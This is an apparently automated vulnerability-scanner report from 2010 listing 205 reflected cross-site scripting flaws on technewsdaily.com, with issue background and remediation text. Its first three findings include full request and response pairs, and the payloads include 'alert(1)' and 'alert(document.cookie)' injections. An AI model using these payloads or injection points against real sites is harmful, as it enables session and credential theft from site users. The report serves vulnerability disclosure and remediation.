technewsdaily.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in technewsdaily.com | Vulnerability Crawler Report

Report generated by XSS.CX at Sat Dec 18 10:37:31 CST 2010.



1. Cross-site scripting (reflected)

1.1. http://www.technewsdaily.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [REST URL parameter 1]

1.3. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]

1.4. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]

1.5. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [REST URL parameter 1]

1.6. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]

1.7. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]

1.8. http://www.technewsdaily.com/about-us/ [REST URL parameter 1]

1.9. http://www.technewsdaily.com/about-us/ [name of an arbitrarily supplied request parameter]

1.10. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [REST URL parameter 1]

1.11. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]

1.12. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]

1.13. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [REST URL parameter 1]

1.14. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]

1.15. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]

1.16. http://www.technewsdaily.com/archive/ [REST URL parameter 1]

1.17. http://www.technewsdaily.com/archive/ [name of an arbitrarily supplied request parameter]

1.18. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [REST URL parameter 1]

1.19. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]

1.20. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]

1.21. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [REST URL parameter 1]

1.22. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]

1.23. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]

1.24. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [REST URL parameter 1]

1.25. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]

1.26. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]

1.27. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [REST URL parameter 1]

1.28. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]

1.29. http://www.technewsdaily.com/blackberry-playbook-tablet-to-launch-in-march-2011-1828/ [name of an arbitrarily supplied request parameter]

1.30. http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/ [REST URL parameter 1]

1.31. http://www.technewsdaily.com/blinded-satellite-gains-ground-in-radio-interference-battle--1420/ [name of an arbitrarily supplied request parameter]

1.32. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [REST URL parameter 1]

1.33. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]

1.34. http://www.technewsdaily.com/change-of-heart-restore-deleted-gmail-contacts-1818/ [name of an arbitrarily supplied request parameter]

1.35. http://www.technewsdaily.com/contact-us/ [REST URL parameter 1]

1.36. http://www.technewsdaily.com/contact-us/ [name of an arbitrarily supplied request parameter]

1.37. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [REST URL parameter 1]

1.38. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]

1.39. http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/ [name of an arbitrarily supplied request parameter]

1.40. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [REST URL parameter 1]

1.41. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]

1.42. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]

1.43. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [REST URL parameter 1]

1.44. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]

1.45. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]

1.46. http://www.technewsdaily.com/dmca-copyright/ [REST URL parameter 1]

1.47. http://www.technewsdaily.com/dmca-copyright/ [name of an arbitrarily supplied request parameter]

1.48. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [REST URL parameter 1]

1.49. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]

1.50. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]

1.51. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [REST URL parameter 1]

1.52. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]

1.53. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]

1.54. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [REST URL parameter 1]

1.55. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]

1.56. http://www.technewsdaily.com/first-chrome-os-laptop-has-no-caps-lock-key-1769/ [name of an arbitrarily supplied request parameter]

1.57. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [REST URL parameter 1]

1.58. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]

1.59. http://www.technewsdaily.com/google-1-leaked-image-shows-social-networking-1767/ [name of an arbitrarily supplied request parameter]

1.60. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [REST URL parameter 1]

1.61. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]

1.62. http://www.technewsdaily.com/google-launches-kids-teach-parents-tech-site-1809/ [name of an arbitrarily supplied request parameter]

1.63. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [REST URL parameter 1]

1.64. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]

1.65. http://www.technewsdaily.com/hacker-strikes-florida-campus-1455/ [name of an arbitrarily supplied request parameter]

1.66. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [REST URL parameter 1]

1.67. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]

1.68. http://www.technewsdaily.com/hologram-technology-nearly-reality-1560/ [name of an arbitrarily supplied request parameter]

1.69. http://www.technewsdaily.com/how-4g-works-100128-0121/ [REST URL parameter 1]

1.70. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]

1.71. http://www.technewsdaily.com/how-4g-works-100128-0121/ [name of an arbitrarily supplied request parameter]

1.72. http://www.technewsdaily.com/how-imax-works-0320/ [REST URL parameter 1]

1.73. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]

1.74. http://www.technewsdaily.com/how-imax-works-0320/ [name of an arbitrarily supplied request parameter]

1.75. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [REST URL parameter 1]

1.76. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]

1.77. http://www.technewsdaily.com/how-to-deauthorize-a-computer-from-itunes-remotely-1280/ [name of an arbitrarily supplied request parameter]

1.78. http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/ [REST URL parameter 1]

1.79. http://www.technewsdaily.com/how-to-protect-your-laptop-in-public-places-1542/ [name of an arbitrarily supplied request parameter]

1.80. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [REST URL parameter 1]

1.81. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]

1.82. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596/ [name of an arbitrarily supplied request parameter]

1.83. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ [REST URL parameter 1]

1.84. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/ [name of an arbitrarily supplied request parameter]

1.85. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [REST URL parameter 1]

1.86. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [REST URL parameter 2]

1.87. http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/index.php [name of an arbitrarily supplied request parameter]

1.88. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [REST URL parameter 1]

1.89. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]

1.90. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]

1.91. http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/ [REST URL parameter 1]

1.92. http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/ [name of an arbitrarily supplied request parameter]

1.93. http://www.technewsdaily.com/index.php [REST URL parameter 1]

1.94. http://www.technewsdaily.com/index.php [name of an arbitrarily supplied request parameter]

1.95. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [REST URL parameter 1]

1.96. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]

1.97. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]

1.98. http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/ [REST URL parameter 1]

1.99. http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/ [name of an arbitrarily supplied request parameter]

1.100. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [REST URL parameter 1]

1.101. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]

1.102. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]

1.103. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [REST URL parameter 1]

1.104. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]

1.105. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]

1.106. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [REST URL parameter 1]

1.107. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]

1.108. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]

1.109. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [REST URL parameter 1]

1.110. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]

1.111. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]

1.112. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [REST URL parameter 1]

1.113. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]

1.114. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]

1.115. http://www.technewsdaily.com/malware-will-change-the-face-of-warfare-1321/ [REST URL parameter 1]

1.116. http://www.technewsdaily.com/media/system/js/caption.js [REST URL parameter 4]

1.117. http://www.technewsdaily.com/media/system/js/evalidate.js [REST URL parameter 4]

1.118. http://www.technewsdaily.com/media/system/js/mootools.1.2.5.js [REST URL parameter 4]

1.119. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [REST URL parameter 1]

1.120. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]

1.121. http://www.technewsdaily.com/must-follow-rules-for-safe-online-shopping-1827/ [name of an arbitrarily supplied request parameter]

1.122. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [REST URL parameter 1]

1.123. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]

1.124. http://www.technewsdaily.com/neuron-like-computer-hardware-finally-gets-software-1746/ [name of an arbitrarily supplied request parameter]

1.125. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [REST URL parameter 1]

1.126. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]

1.127. http://www.technewsdaily.com/new-cell-network-doesnt-depend-on-towers--0882/ [name of an arbitrarily supplied request parameter]

1.128. http://www.technewsdaily.com/newsletter-subscription/ [REST URL parameter 1]

1.129. http://www.technewsdaily.com/newsletter-subscription/ [name of an arbitrarily supplied request parameter]

1.130. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [REST URL parameter 1]

1.131. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]

1.132. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]

1.133. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [REST URL parameter 1]

1.134. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]

1.135. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]

1.136. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [REST URL parameter 1]

1.137. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]

1.138. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]

1.139. http://www.technewsdaily.com/privacy-policy/ [REST URL parameter 1]

1.140. http://www.technewsdaily.com/privacy-policy/ [name of an arbitrarily supplied request parameter]

1.141. http://www.technewsdaily.com/reviews/ [REST URL parameter 1]

1.142. http://www.technewsdaily.com/reviews/ [name of an arbitrarily supplied request parameter]

1.143. http://www.technewsdaily.com/section/cool-gadgets [REST URL parameter 1]

1.144. http://www.technewsdaily.com/section/cool-gadgets [name of an arbitrarily supplied request parameter]

1.145. http://www.technewsdaily.com/section/cool-gadgets/ [REST URL parameter 1]

1.146. http://www.technewsdaily.com/section/cool-gadgets/ [name of an arbitrarily supplied request parameter]

1.147. http://www.technewsdaily.com/section/future-tech [REST URL parameter 1]

1.148. http://www.technewsdaily.com/section/future-tech [name of an arbitrarily supplied request parameter]

1.149. http://www.technewsdaily.com/section/future-tech/ [REST URL parameter 1]

1.150. http://www.technewsdaily.com/section/future-tech/ [name of an arbitrarily supplied request parameter]

1.151. http://www.technewsdaily.com/section/how-to [REST URL parameter 1]

1.152. http://www.technewsdaily.com/section/how-to [name of an arbitrarily supplied request parameter]

1.153. http://www.technewsdaily.com/section/how-to/ [REST URL parameter 1]

1.154. http://www.technewsdaily.com/section/how-to/ [name of an arbitrarily supplied request parameter]

1.155. http://www.technewsdaily.com/section/military-spy-tech [REST URL parameter 1]

1.156. http://www.technewsdaily.com/section/military-spy-tech [name of an arbitrarily supplied request parameter]

1.157. http://www.technewsdaily.com/section/military-spy-tech/ [REST URL parameter 1]

1.158. http://www.technewsdaily.com/section/military-spy-tech/ [name of an arbitrarily supplied request parameter]

1.159. http://www.technewsdaily.com/section/mobile-life [REST URL parameter 1]

1.160. http://www.technewsdaily.com/section/mobile-life [name of an arbitrarily supplied request parameter]

1.161. http://www.technewsdaily.com/section/mobile-life/ [REST URL parameter 1]

1.162. http://www.technewsdaily.com/section/mobile-life/ [name of an arbitrarily supplied request parameter]

1.163. http://www.technewsdaily.com/section/social-media [REST URL parameter 1]

1.164. http://www.technewsdaily.com/section/social-media [name of an arbitrarily supplied request parameter]

1.165. http://www.technewsdaily.com/section/social-media/ [REST URL parameter 1]

1.166. http://www.technewsdaily.com/section/social-media/ [name of an arbitrarily supplied request parameter]

1.167. http://www.technewsdaily.com/section/software [REST URL parameter 1]

1.168. http://www.technewsdaily.com/section/software [name of an arbitrarily supplied request parameter]

1.169. http://www.technewsdaily.com/section/software/ [REST URL parameter 1]

1.170. http://www.technewsdaily.com/section/software/ [name of an arbitrarily supplied request parameter]

1.171. http://www.technewsdaily.com/section/tech-one [REST URL parameter 1]

1.172. http://www.technewsdaily.com/section/tech-one [name of an arbitrarily supplied request parameter]

1.173. http://www.technewsdaily.com/section/tech-one/ [REST URL parameter 1]

1.174. http://www.technewsdaily.com/section/tech-one/ [name of an arbitrarily supplied request parameter]

1.175. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [REST URL parameter 1]

1.176. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]

1.177. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]

1.178. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [REST URL parameter 1]

1.179. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]

1.180. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]

1.181. http://www.technewsdaily.com/stuxnet-malware-blueprint-dangerous-viruses-1353/ [REST URL parameter 1]

1.182. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [REST URL parameter 1]

1.183. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]

1.184. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]

1.185. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [REST URL parameter 1]

1.186. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]

1.187. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]

1.188. http://www.technewsdaily.com/templates/technewsdaily/css/technewsdaily.css [REST URL parameter 4]

1.189. http://www.technewsdaily.com/terms-and-conditions/ [REST URL parameter 1]

1.190. http://www.technewsdaily.com/terms-and-conditions/ [name of an arbitrarily supplied request parameter]

1.191. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [REST URL parameter 1]

1.192. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]

1.193. http://www.technewsdaily.com/the-exciting-new-features-in-android-23-gingerbread-1758/ [name of an arbitrarily supplied request parameter]

1.194. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [REST URL parameter 1]

1.195. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]

1.196. http://www.technewsdaily.com/top-games-get-electronic-makeover-1804/ [name of an arbitrarily supplied request parameter]

1.197. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [REST URL parameter 1]

1.198. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]

1.199. http://www.technewsdaily.com/trends-of-2010-as-shown-by-25-million-tweets-1797/ [name of an arbitrarily supplied request parameter]

1.200. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [REST URL parameter 1]

1.201. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]

1.202. http://www.technewsdaily.com/wave-of-spam-surrounds-new-harry-potter-movie-1450/ [name of an arbitrarily supplied request parameter]

1.203. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [REST URL parameter 1]

1.204. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]

1.205. http://www.technewsdaily.com/what-is-an-rss-feed--0813/ [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 205 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.technewsdaily.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51f8f'-alert(1)-'aecd03e5b1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?51f8f'-alert(1)-'aecd03e5b1d=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 01:21:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=337300fhdohitef3l36rqgdho5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 01:21:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/?51f8f'-alert(1)-'aecd03e5b1d=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.2. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /2010-top-social-network-screw-ups-1832/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81650'-alert(1)-'6466bcff7f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-top-social-network-screw-ups-183281650'-alert(1)-'6466bcff7f0/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/2010-top-social-network-screw-ups-183281650'-alert(1)-'6466bcff7f0/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.3. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /2010-top-social-network-screw-ups-1832/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cb8c"><a>756a7e7e28c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2010-top-social-network-screw-ups-1832/?6cb8c"><a>756a7e7e28c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
